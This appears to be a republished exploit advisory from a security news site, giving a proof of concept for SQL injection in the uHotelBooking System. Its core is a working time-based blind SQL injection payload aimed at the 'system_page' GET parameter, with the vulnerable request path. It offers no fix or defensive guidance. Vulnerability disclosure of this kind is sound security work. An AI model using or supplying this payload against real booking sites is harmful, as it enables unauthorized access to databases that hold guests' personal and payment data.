Exploit h27

Published on March 23rd, 2019 📆 | 2461 Views ⚑

0

uHotelBooking System SQL Injection

 

uHotelBooking System suffers from a remote SQL injection vulnerability.


MD5 | 1032cc0d2c76fb311dde4a98ae107feb

 

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z

 

Loading…

Free Download WordPress Themes
Premium WordPress Themes Download
Download Best WordPress Themes Free Download
Download WordPress Themes Free
free download udemy course

Tagged with:



Leave a Reply


Back to Top ↑